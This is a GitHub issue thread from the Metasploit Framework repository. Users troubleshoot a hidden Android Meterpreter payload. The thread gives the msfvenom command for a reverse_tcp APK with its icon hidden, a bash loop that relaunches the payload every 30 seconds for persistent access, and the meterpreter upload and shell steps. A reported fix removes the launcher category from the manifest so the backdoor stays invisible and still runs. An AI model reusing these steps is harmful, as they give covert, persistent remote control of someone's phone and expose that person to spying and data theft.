rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Running the apk permanent access script when the payload is hidden #17953

Closed mahyarkermani closed 1 year ago

mahyarkermani commented 1 year ago

Hi guys, this question has been asked many times in the metasploit issues but no solution has been provided for it, so I am asking this question again. I made a simple payload for Android with the following command. The desired payload is hidden after installation: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.40 lport=5656 -a dalvik --platform android AndroidHideAppIcon=true -o payload.apk

Then I upload a small script to create permanent access to the target:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 30
done

# script.sh

And then with the following commands, I upload and run this script in the target:

cd /sdcard
upload script.sh
shell
sh script.sh

and after running the script, I get the following error

Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

The reason for this error is that the apk file is hidden on the user's device with the AndroidHideAppIcon=true option. If the payload is installed normally and its icon is not hidden (don't use the AndroidHideAppIcon=true option), the script works well. Actually, the problem is due to the non-recognition of routes in the am command (in script.sh).

Tested device

I did all this on Kali Linux 2022 with the latest Metasploit update and related tools. Also, the target Android device is my Samsung running Android 8.

Conclusion

This does not seem to be a problem or a bug in Metasploit (in some issues, people mentioned a bug in Metasploit). In my opinion, the main idea is that the am tool (Activity Manager) in the script cannot correctly identify parameters or different paths and finally execute the hidden apk. Please, if you have any ideas, comments or solutions, post them in this issue, so that we can solve this problem once and for all. Thank you.

mahyarkermani commented 1 year ago

Even when we execute the app_run com.metasploit.stage command directly from meterpreter, we get the following error: com.metasploit.stage Not Found

In fact, this command is responsible for running programs from meterpreter (using the package name), but when the apk is hidden, this command cannot run the program (of course, this is normal; I meant that the problem most likely comes from implementing parameters and finding apk paths). This is even though the package name is listed by the app_list command.

mahyarkermani commented 1 year ago

holy shit. Yes, Yes. I found the solution. I don't know how it works when we use hide_app_icon command in Metasploit. Apparently, it hides the activity class MainActivity part and makes our script unable to find and execute it. It's not a good idea to hide the app. You can decompile your apk file, then remove the <category android:name="android.intent.category.LAUNCHER" /> line in the AndroidManifest.xml file. This will make the program not disappear from the device's default launcher (in fact, the program icon will not appear on the user's menu) and in addition, no additional changes will be applied to the payload. Then you can execute the payload through the desired script.

ChillVibesMushroom commented 2 months ago


I did what you said in the AndroidManifest.xml and deleted the launcher category, but now I can't open the app. Is this supposed to be in the AndroidManifest.xml outside of the original folder or the one inside the original folder after apktool d apk.apk? I did manage to get the app taken off of the home screen and app drawer, but again it won't open.

ChillVibesMushroom commented 2 months ago

I'm saying I delete this category android:name="android.intent.category.LAUNCHER" and when I recompile and install the app, the app won't open or run the main activity.